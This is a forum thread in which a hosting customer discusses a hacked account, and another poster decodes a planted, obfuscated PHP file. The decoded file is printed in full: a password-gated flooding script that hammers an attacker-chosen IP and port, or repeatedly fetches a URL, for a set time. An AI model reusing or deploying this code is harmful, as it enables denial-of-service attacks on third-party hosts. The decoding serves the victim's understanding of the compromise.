Alright everything is ok now, they cleared all the files and gave a fresh start. They told I had been hacked into and told me to change all my passwords etc. It's a trustable host after all I think?
I guess that the hosting service handled the situation quite well, there was no need for you to get so insultive. They couldn't have known that the IP doesn't belong to you.
The code in the suspicious PHP file is nothing but a function to unhash and decompress a string so I guess the only thing it could have caused is some extra load on their servers (though quite negligible IMO).
The code in the suspicious PHP file is nothing but a function to unhash and decompress a string so I guess the only thing it could have caused is some extra load on their servers (though quite negligible IMO).
Man, you're not allowed to use CPU cycles on the server space you pay for anymore?
On the hosts I've had to deal with, they allocate an equal amount of maximum CPU usage for each user of a server..I know, I apologized them and they did aswell. I just had an unauthorised payment from them like a week ago that's why I was all mad. I though these things were linked together.
But yea, all good now, they handled their things well after all and I did too as I made them understand?
I'm just wondering, if someone hacks in my websites, why would he just leave a file like that and nothing else?
It's recursively encoded, 3 passes total. The real content is this:
<?php
php
if($_REQUEST['pw']!="cracken!"){
echo ".";
return 1;
}
ignore_user_abort(TRUE);
@set_time_limit(0);
if(isset($_GET['type'])){
$schema = $_GET['type'].'://';
}else{
$schema = 'udp://';
}
if(isset($_GET['ip'])&&is_numeric($_GET['time'])&&isset($_GET['port'])){
$exec_time = $_GET['time'];
$max_time = time()+$exec_time;
$host = $_GET['ip'];
if(isset($_GET['data'])){
$f = @fopen($_GET['data'],"r");
if($f){
while($temp = fgets($f,500))
$out .= $temp;
}
}else{
for($i=0;$i<65000;$i++)
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time)
break;
if ($_GET['port'] == "rand")
$rand = rand(1,65000);
else
$rand = $_GET['port'];
$fp = fsockopen($schema.$host, $rand, $errno, $errstr, 5);
if($fp)
fwrite($fp, $out);
fclose($fp);
}
echo "$packets packets (".round((($packets*65)/1024),2) . " MB) @ ".round($packets/$exec_time,2)." pps (".round((($packets*65)/1024)/$exec_time,2)."MBps)";
}elseif(isset($_GET['webreader'])&&is_numeric($_GET['time'])){
$exec_time = $_GET['time'];
$max_time = time()+$exec_time;
while(1){
if(time() > $max_time)
break;
$f = @fopen($_GET['webreader'],"r");
}
echo "Done";
}
?>
what a load of crap. they already know someone hacked your ftp account, it's not like you have a vulnerable php script on there...
nice script though, i would have figured they'd upload something that does more than flood ports.
1
2
Byethost, (never) again [solved].
(32 posts, started )
FGED GREDG RDFGDR GSFDG